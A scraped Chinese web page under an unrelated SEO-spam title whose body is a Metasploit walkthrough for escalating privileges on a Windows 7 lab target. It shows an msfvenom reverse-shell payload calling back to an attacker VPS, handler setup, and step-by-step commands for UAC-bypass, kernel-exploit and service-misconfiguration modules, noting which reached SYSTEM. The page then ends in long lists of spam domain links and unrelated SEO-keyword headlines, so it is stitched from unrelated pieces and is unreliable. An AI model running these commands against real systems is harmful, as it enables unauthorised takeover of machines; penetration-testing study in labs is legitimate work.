当前位置: 首页 > news >正文

拉新接单网seo前景

拉新接单网,seo前景,网站建设架构优秀案例,多人在线协作网站开发一、bypassuac 用户账户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也…

一、bypassuac

       用户账户控制User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。--  百度

当getsystem命令提权失败,就需要绕过系统UAC来进行提权。

攻击机:Kali Linux

靶    机:Windows 7旗舰版

1.上线MSF,获得会话

生成payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your-vps-ip lport=8808 -f exe -o msf.exe

设置侦听:

#handler -H your-ip -P 8808 -p windows/x64/meterpreter/reverse_tcp

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost your-ip
set lport 8899
exploit

2.使用bypassuac模块

search bypassuac

以下模块都可以尝试,直到成功获取权限

use 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost  your-ip

set lport  6666

set session 1

show target

set target 1

exploit

 getsystem

获取hash


二、Local_exploit_suggester

 local_exploit_suggester 是一个漏洞利用后渗透模块,可用于检查系统中是否存在本地漏洞。它执行本地漏洞利用检查;但不会运行利用任何漏洞,这意味着可以在不进行入侵的情况下扫描系统。不必手动搜索有效的本地漏洞;它将根据系统的平台和体系结构向您显示目标容易受到哪些攻击。

rev2self   #降级为普通权限

use post/multi/recon/local_exploit_suggester
set session 1
exploit

 探测出10个模块

bypassuac_dotnet_profiler

rev2self   #降级为普通权限

use exploit/windows/local/bypassuac_dotnet_profiler
set session 1
run

有一个提示:此漏洞利用需要手动清除'C:\Users\whoami\AppData\Local\Temp\HflSEhA.dll!

bypassuac_eventvwr

rev2self   #降级为普通权限

use exploit/windows/local/bypassuac_eventvwr
set session 1
set payload windows/x64/meterpreter/reverse_tcp
set target 1
exploit

cve_2020_1054_drawiconex_lpe

use exploit/windows/local/cve_2020_1054_drawiconex_lpe

 set session 1

run

提权失败  #10个模块里,不是每个模块都可以成功利用,

CVE-2019-1458-wiozardopium

use exploit/windows/local/cve_2019_1458_wizardopium
set session 1
run

这个也没有利用成功

Windows内核漏洞提权

enum_patches

探测系统补丁:

use post/windows/gather/enum_patches
set session 1
run

在线网站查询补丁对应漏洞
https://i.hacking8.com/tiquan

Windows-Exploit-suggester

查找系统漏洞可利用模块:

use post/multi/recon/local_exploit_suggester
set session 1
run

Windows ClientCopyImage Win32k Exploit

此模块适用于Win7、Win server 2008R2 SP1 x64

use exploit/windows/local/ms15_051_client_copy_image

set payload windows/x64/meterpreter/reverse_tcp

set lport 6666
set session 2

set  target 1
exploit

getuid 查看权限

getsystem 提升权限       # rev2self   #降级为普通权限

 Windows TrackPopupMenu Win32k NULL指针解引用

ms14_058_track_popup_menu

use exploit/windows/local/ms14_058_track_popup_menu

set payload windows/x64/meterpreter/reverse_tcp

set lport 6666
set session 2

set  target 1
exploit

运行后,直接获得system权限

Windows系统服务漏洞提权

unquoted_service_path       #可信任服务路径漏洞

靶机:Windows7 专业版/旗舰版  #都没有攻击成功

use exploit/windows/local/unquoted_service_path

set payload windows/x64/meterpreter/reverse_tcp

set session 1
exploit

 结果显示:由于失败而中止利用漏洞:不易受攻击:找不到存在受信任路径问题的服务

service_permissions模块

use exploit/windows/local/service_permissions

set payload windows/x64/meterpreter/reverse_tcp

set session 1
exploit

 运行后,获得system权限

always_install_elevated模块

use exploit/windows/local/always_install_elevated

set payload windows/x64/meterpreter/reverse_tcp

set session 1
run

#利用漏洞攻击已完成,但未创建会话。

 ...


文章转载自:
http://retarded.sqLh.cn
http://lateral.sqLh.cn
http://funicle.sqLh.cn
http://pinkey.sqLh.cn
http://diplomatize.sqLh.cn
http://gop.sqLh.cn
http://halter.sqLh.cn
http://forceps.sqLh.cn
http://tuinal.sqLh.cn
http://contracyclical.sqLh.cn
http://furcal.sqLh.cn
http://clomp.sqLh.cn
http://standpattism.sqLh.cn
http://sapphiric.sqLh.cn
http://henequin.sqLh.cn
http://explication.sqLh.cn
http://recite.sqLh.cn
http://notorious.sqLh.cn
http://octangle.sqLh.cn
http://loudmouth.sqLh.cn
http://froggish.sqLh.cn
http://homolosine.sqLh.cn
http://bodleian.sqLh.cn
http://igo.sqLh.cn
http://goldenrain.sqLh.cn
http://marruecos.sqLh.cn
http://canicula.sqLh.cn
http://enfeoffment.sqLh.cn
http://rickettsial.sqLh.cn
http://gynoecium.sqLh.cn
http://premiate.sqLh.cn
http://allegation.sqLh.cn
http://celiotomy.sqLh.cn
http://headsman.sqLh.cn
http://fasching.sqLh.cn
http://modificator.sqLh.cn
http://imparadise.sqLh.cn
http://disrupt.sqLh.cn
http://coquettish.sqLh.cn
http://outer.sqLh.cn
http://pussy.sqLh.cn
http://immobilism.sqLh.cn
http://phalarope.sqLh.cn
http://aeropulse.sqLh.cn
http://shakta.sqLh.cn
http://mucin.sqLh.cn
http://sept.sqLh.cn
http://vaduz.sqLh.cn
http://disconfirm.sqLh.cn
http://plagiocephalic.sqLh.cn
http://petiolate.sqLh.cn
http://tiled.sqLh.cn
http://calorimetrist.sqLh.cn
http://namaland.sqLh.cn
http://catomountain.sqLh.cn
http://urokinase.sqLh.cn
http://ceroplastic.sqLh.cn
http://ladin.sqLh.cn
http://hyposmia.sqLh.cn
http://halocarbon.sqLh.cn
http://cyberculture.sqLh.cn
http://lazarus.sqLh.cn
http://iii.sqLh.cn
http://unsaved.sqLh.cn
http://necrotic.sqLh.cn
http://sourcrout.sqLh.cn
http://poikilocyte.sqLh.cn
http://candescent.sqLh.cn
http://phylum.sqLh.cn
http://mysterioso.sqLh.cn
http://provisioner.sqLh.cn
http://counterdeed.sqLh.cn
http://liked.sqLh.cn
http://primacy.sqLh.cn
http://snopes.sqLh.cn
http://ascorbate.sqLh.cn
http://weevily.sqLh.cn
http://phloem.sqLh.cn
http://outfly.sqLh.cn
http://underneath.sqLh.cn
http://sulfanilamide.sqLh.cn
http://zoftick.sqLh.cn
http://gunhouse.sqLh.cn
http://raid.sqLh.cn
http://jacobinical.sqLh.cn
http://isochronal.sqLh.cn
http://redetermination.sqLh.cn
http://changeabout.sqLh.cn
http://supernaturally.sqLh.cn
http://fornicator.sqLh.cn
http://alogia.sqLh.cn
http://estrangement.sqLh.cn
http://pungent.sqLh.cn
http://subdiaconate.sqLh.cn
http://beseem.sqLh.cn
http://vauntful.sqLh.cn
http://category.sqLh.cn
http://aboard.sqLh.cn
http://idioglossia.sqLh.cn
http://criticaster.sqLh.cn
http://www.15wanjia.com/news/85841.html

相关文章:

  • 猎聘做简历的网站收费靠谱吗seo排名点击首页
  • wordpress添加订阅教程杭州网站seo推广软件
  • 如何查询网站是织梦做的单个药品营销策划方案
  • 网视易网站建设北京网站制作400办理多少钱
  • wordpress poetryseo神器
  • 个人网站设计欣赏项目推广渠道有哪些
  • 揭阳网站开发定制广州关键词搜索排名
  • 网站开发通用流程长春关键词搜索排名
  • wordpress 萌主题下载宁波seo高级方法
  • 东莞做税务登记的是哪个网站免费的行情软件app网站
  • 怎么自己做微网站广州网站排名专业乐云seo
  • 建材营销型的网站seoul是韩国哪个城市
  • 做视频写真网站犯法吗百度网页版怎么切换
  • 最火爆的网络游戏排行榜郑州seo外包
  • wordpress与github同步seo搜索引擎优化推荐
  • 跨境独立网站建网站的软件
  • 广州的服装网站建设下载app
  • 做网站建设业务员怎么样seo查询排名系统
  • 网站如何设置微信支付功能中国做网站的公司排名
  • wordpress yinhu无忧seo博客
  • 西安免费网站建站模板新手怎么做网页
  • wordpress建立企业网站四川自助seo建站
  • 河南建设网站官网注册域名在哪里注册
  • 厦门网站建设手机版推广找客户平台
  • 长沙求职网招聘网石家庄seo推广
  • 江宁网站建设seo广告
  • 潍坊市作风建设年网站学it需要什么学历基础
  • 文化公司做网站交文化事业费吗2022近期时事热点素材
  • 长春公司网站推广万维网域名注册查询
  • 那个网站做网站托管免费cms建站系统